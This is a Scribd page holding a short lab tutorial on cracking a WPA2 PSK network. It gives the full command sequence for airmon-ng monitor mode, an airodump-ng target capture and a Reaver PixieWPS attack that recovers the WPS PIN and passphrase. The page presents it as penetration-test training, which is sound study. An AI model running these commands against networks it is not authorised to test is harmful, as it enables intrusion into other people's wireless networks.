Scribd
Upload
418 views4 pages

Lab: Crack Wpa2 PSK Network With Reaver & Pixiewps: Scenario

This document provides steps to crack the WPA2 PSK network password of a Belkin AP using Reaver and PixieWPS attacks on Kali Linux. It outlines initializing the wireless monitor interface, capturing packets from the target AP to obtain the BSSID and channel, and running Reaver and PixieWPS with those details to reveal the network password and PIN. PixieWPS can also discover additional information about the AP like the model and manufacturer.

Uploaded by

Luis Outlook
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
418 views4 pages

Lab: Crack Wpa2 PSK Network With Reaver & Pixiewps: Scenario

This document provides steps to crack the WPA2 PSK network password of a Belkin AP using Reaver and PixieWPS attacks on Kali Linux. It outlines initializing the wireless monitor interface, capturing packets from the target AP to obtain the BSSID and channel, and running Reaver and PixieWPS with those details to reveal the network password and PIN. PixieWPS can also discover additional information about the AP like the model and manufacturer.

Uploaded by

Luis Outlook
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

Lab : Crack WPA2 PSK network With Reaver &

PixieWPS
Scenario

Attacker – Kali Linux(Sana) Machine (not VM)

Target – Belkin AP

Step 1 : Initial Setup

Start monitor interface inorder to start capturing packets from air.

Command: service network-manager stop


Command: airmon-ng check

Kill interfering processes. Do this repeteadly for all processes until airmon-ng check gives
“no interfering” output.

Command: kill -9 <pid>

Start the monitor interface.

Command: airmon-ng check


Command: iwconfig
command: airmon-ng start wlan0 <replace with yours>

Reaver Initial Setup


Reaver Initial Setup

Step 2 : Start Capture & select target.

Airodump dumps the packets received on the monitor interface. We can choose whether
or not to write the packets to a file. A full tutorial on this will be coming in the near future.

command: airodump-ng wlan0mon <replace with yours>

Starting Capture

Executing Airodump actually turns the terminal to an updating terminal which shows all
information. Note the target BSSID, channel & ESSID. Press control+c to stop airodump.

Run reaver with relevant info.

command: reaver -i wlan0mon <replace with yours> -b <bssid> -c


<channel no> -K 1 -vv
Capture & Reaver Output

From the above figure, we can get the MAC of our target. Make a note of this, then run
reaver.
Pixie Output

There you have the passphrase & the PIN. Thus this is a combined Offline – Online attack
which can be run against wireless access points during Wireless Penetration
tests. Interestingly, PixieWPS finds out a lot of other information like the model number
of the AP, manufacturer etc. So during tests, one can use this to search for common-
known vulnerabilities of the specific AP.

For best perfomance of the attack use Alfa Network AWUS036NH or similar model.

Related Video: https://vimeo.com/126489367

You might also like